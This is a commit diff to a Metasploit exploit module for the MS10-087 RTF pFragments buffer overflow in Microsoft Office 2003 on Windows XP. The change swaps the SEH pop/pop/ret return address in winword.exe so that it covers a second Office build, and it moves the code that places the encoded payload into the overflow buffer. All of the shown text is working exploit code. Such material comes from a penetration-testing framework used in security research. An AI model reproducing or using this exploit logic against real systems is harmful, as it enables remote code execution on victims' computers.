switch target to p/p/r that works on multiple versions

git-svn-id: file:///home/svn/framework3/trunk@11459 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb

@@ -63,10 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Targets'        =>
 				[
 					# Office v11.8307.8324, winword.exe v11.0.8307.0
+					# Office v11.8328.8221, winword.exe v11.0.8328.0
 					[ 'Microsoft Office 2003 SP3 English on Windows XP SP3 English',
 						{
 							'Offsets' => [ 24536, 51112 ],
-							'Ret' => 0x300294e7 # p/p/r in winword.exe
+							'Ret' => 0x30001bdd # p/p/r in winword.exe
 						}
 					],
 
@@ -124,11 +125,9 @@ class Metasploit3 < Msf::Exploit::Remote
 			rest = Rex::Text.pattern_create(offsets.max + seh.length + jmp_back.length)
 		else
 			rest = rand_text(offsets.max + seh.length + jmp_back.length)
+			rest[0, payload.encoded.length] = payload.encoded
 		end
 
-		# Add the payload
-		rest[0, payload.encoded.length] = payload.encoded
-
 		# Fill in the seh frames
 		offsets.each { |off|
 			rest[off, seh.length] = seh